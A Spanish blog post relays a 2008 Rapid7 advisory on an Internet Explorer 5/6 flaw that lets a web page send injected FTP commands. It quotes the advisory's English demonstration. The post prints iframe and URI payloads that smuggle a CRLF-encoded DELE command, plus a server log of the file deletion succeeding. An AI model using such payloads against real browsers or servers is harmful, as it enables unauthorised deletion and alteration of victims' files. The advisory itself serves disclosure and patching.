Una Empresa de Seguridad ha reportado un exploit o vulnerabilidad en Microsoft Internet Explorer 5 y 6, el cual puede ser aprovechado utilizando un codigo malicioso mediante comandos FTP
lo cual le permitirá eliminar, renombrar, descargar o subir archivos bajo la dirección IP o nombre de usuario de la víctima.El problema de seguridad es provocado por un error de filtro en Internet Explorer. Rapid7 ha agregado en su reporte un ejemplo de un elemento HTML que aprovecharía esta vulnerabilidad eliminando el archivo foo.txt desde un servidor:
<iframe src=”ftp://user@site:port/%0D%0ADELE%20foo.txt%0D%0A//”/>
Para que el exploit tenga éxito es necesario contar con una cuenta que tenga los privilegios necesarios para realizar cambios en el respectivo servidor.
Por su parte Microsoft ya está enterado de esta vulnerabilidad y asegura que se encuenta trabajando en un parche que la solucione. De momento esto sólo se ha confirmado en la versión 5 y 6 de Internet Explorer, por tanto es recomendable actualizar a la última versión del navegador para evitar el problema de seguridad.
Creditos:
Rapid7
Opensecurity España
Demonstration of the exploit piggybacking on a pre-authenticated connection (malicious URL with two trailing forward slashes) with IE6 SP2: Malicious URI: ftp://admin@10.2.45.237/%0D%0ADELE%20foo.txt%0D%0ACWD// --> Welcome banner 220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 2007) ready. <-- IE6 Requests a user USER admin --> FTP server requires password 331 Password required for admin. <-- IE6 supplies password. PASS admin --> FTP Server responds with successful login. 230 User admin logged in. <-- IE6 tests 'OPTS UTF8' option. opts utf8 on --> Server responds with negative permanent reply to OPTS request. 500 'OPTS utf8 on': command not understood. <-- IE6 asks for the present working directory. PWD --> Server sends positive completion reply for PWD. 257 "/home/admin" is current directory. <-- IE6 requests malicious FTP URI from an iframe in HTML doc CWD /home/admin/ DELE foo.txt CWD/ --> Server responds with positive completion for CWD 250 CWD command successful. <-- IE6 sends a 'TYPE A' request TYPE A --> Server responds with positive completion for DELE 250 DELE command successful. <-- IE6 sends a NOOP. noop --> Server sends negative permanent response for last (invalid) command. 500 'CWD/': command not understood. And the file no longer exists. 6. Credit Discovered by Derek Abdine of Rapid7. 7. Contact Information Rapid7, LLC Email: advisory (at)rapid7.com Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.
- Hotmail pide actualizar navegadores a sus usuarios inclusive recomienda Firefox Safari
- Windows Vista SP1 disponible para Descarga
- Exploit Hace vulnerable a Windows 7 y versiones Anteriores.
- Vulnerabilidad / Exploit en Google Chrome ha sido detectada
- Internet Explorer 8 - Beta 1 Disponible para descarga
- Internet Explorer 8 y sitios incompatibles y estandarizacion de IE8
 |
Acerca del Author |
Recent Comments